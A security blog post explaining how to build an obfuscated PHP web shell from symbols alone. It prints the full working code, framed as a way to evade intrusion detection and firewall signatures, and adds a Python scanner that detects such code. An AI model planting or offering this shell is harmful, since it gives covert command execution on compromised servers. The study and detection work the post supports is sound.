Anti Alphanum PHP Shell
After my release about the Tiny PHP Shell, Mr. Gareth Hayes @ The Spanner made a non-alphanumeric variant.
I got inspired by his nifty script and started researching further.
My main plan was to create an array of data with different values in order to have something to work with. So my first shot was this:
@$_[]=@!+_;
PHP will try to parse the underscore as a constant; when the interpreter is unable to find that constant, it emits a notice. I suppress the notice using the '@'.
The "lost constant" is in turn converted to a string (string(1) "_").
Just like Gareth Hayes, I used the plus operator to cast the string to an integer (int(0)).
By putting the exclamation mark in front, the value 0 is cast to a boolean (bool(true)).
So far so good! We have a boolean saying true!
I try to store it by pushing the value into the array $_. However, that array doesn't exist yet.
By suppressing that notice too, PHP will automagically create the array for you, and your value will get stored.
That's how I initialize my array. So, what do we do now?
Well, just like Mr. Gareth stated, if you try to access an array as a string in PHP, it will generate the string "Array".
If we have a string, we can generate other strings out of it by (ab)using the bitwise AND, OR and XOR operators.
I figured I had quite a few characters I could easily generate in PHP.
So I coded a fuzzer in VB.NET which permuted through AND, OR and XOR and gave me all the combinations that matched any letter in the words GET, POST and REQUEST. (Now that I think about it, I could have added COOKIE too...)
Nevertheless, my fuzzer (phpfuzz.vb) gave me the following results: fuzz_result.txt.
By analyzing the results, you'll notice we're able to generate all three of those names using only a 15-character list.
But for the sake of clarity, I chose to go with GET.
By utilizing some boolean magic and variable dereferencing I ended up with this:
<?
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$ //Fredrik N. Almroth - h.ackack.net
$_[$__+$__];$_[@-_]($_[@!+_]);
?>
...if WordPress tampered with the bytes, you may download it here.
The method of execution used in the Tiny PHP Shell and Gareth's shell remains the same.
But if you look closely, I added a few sneak factors:
- No quotes! Quotes tend to trigger IDSes and WAFs.
- No use of functions.
- No strings.
- No numbers.
- No constants.
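Those five properties are exactly what defeats a signature that looks for quoted strings, function names or digits. From the defender's side the useful observation is the inverse: code with (almost) no letters or digits that still ends in a call through array data is itself a strong signal. The scanner below is an added example written for this post, not code from the original or from the author; it strips comments (so a payload can't be padded with prose to look normal), measures the alphanumeric share of the remaining PHP, and looks for the two shapes the shell above depends on: an error-suppressed operator chain ending in a bare constant (`@!+_`) and a call whose callee is read out of an array (`$_[...](...)`). Both PHP samples are constructed for the demo; the threshold of 0.25 is a hand-picked value for illustration, not a tuned one.

```python
import re

# Constructed PHP samples for the demo; neither is taken from a real site.
BENIGN_PHP = """<?php
$items = array_map('trim', explode(',', $_GET['tags'] ?? ''));
foreach ($items as $item) { echo htmlspecialchars($item); }
?>"""

# Same shape as the shell discussed in the post: an array built from juggled
# undefined constants, then a call whose callee is read out of that array.
# Constructed fragment for the test, not a complete program.
SUSPECT_PHP = """<?
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[@-_]($_[@!+_]);
?>"""

PHP_BLOCK = re.compile(r'<\?(?:php)?(.*?)\?>', re.S)
COMMENT = re.compile(r'//[^\n]*|#[^\n]*|/\*.*?\*/', re.S)
# A call whose callee is data rather than a name: $a[...](...) or $$a(...).
DYNAMIC_CALL = re.compile(r'\$+\w*(?:\[[^\]]*\])+\s*\(|\$\$\w+\s*\(')
# Error-suppressed operator chain ending in a bare constant, e.g. @!+_ or @-_.
JUGGLED_CONST = re.compile(r'@[!+\-]+_')

ALNUM_FLOOR = 0.25  # hand-picked for this demo; tune against your own code base


def php_code(source):
    """Return the code inside <? ... ?> blocks, or the whole input if there are none."""
    blocks = PHP_BLOCK.findall(source)
    return "\n".join(blocks) if blocks else source


def strip_comments(code):
    """Drop comments so a payload cannot raise its letter count with a prose comment.
    Heuristic: a '#' or '//' inside a string literal is also removed."""
    return COMMENT.sub('', code)


def alnum_ratio(code):
    """Share of non-whitespace characters that are letters or digits ('_' is neither)."""
    chars = [c for c in code if not c.isspace()]
    if not chars:
        return 1.0
    return sum(c.isalnum() for c in chars) / len(chars)


def analyze(source):
    """Score one PHP file. Flag it only when the alphanumeric share is very low AND
    it shows one of the structural tells; a low ratio alone (minified code) is not enough."""
    code = strip_comments(php_code(source))
    ratio = alnum_ratio(code)
    dynamic = DYNAMIC_CALL.search(code) is not None
    juggled = len(JUGGLED_CONST.findall(code))
    flagged = ratio < ALNUM_FLOOR and (dynamic or juggled > 0)
    return {
        "alnum_ratio": round(ratio, 3),
        "dynamic_call": dynamic,
        "juggled_constants": juggled,
        "flagged": flagged,
    }


if __name__ == "__main__":
    for name, src in (("benign", BENIGN_PHP), ("suspect", SUSPECT_PHP)):
        print(name, analyze(src))
```

The benign sample scores an alphanumeric share of roughly 0.68 and has neither tell; the shell-shaped sample scores 0.0, contains three juggled constants and one dynamic call, and is flagged. Run it over a directory of `.php` files and review what it flags rather than blocking on it: the ratio is meant to be combined with the structural checks, since legitimately minified or generated code can also be symbol-heavy. One further caveat for anyone testing this on a current stack: from PHP 8.0 reading an undefined constant throws an Error instead of emitting a notice, and '@' does not suppress exceptions, so the `@!+_` construction no longer works there as described.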
If you're going to the Chaos Communication Congress - 28C3 (2011), then see you there!
Ciao.


Hey, I'm Fredrik. I'm from Sweden, born 1990, and I have a huge interest in information technology and information security. So far, I've been studying for three years at the International IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm currently working at Young / Skilled and as a shareholder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on Twitter @Almroot.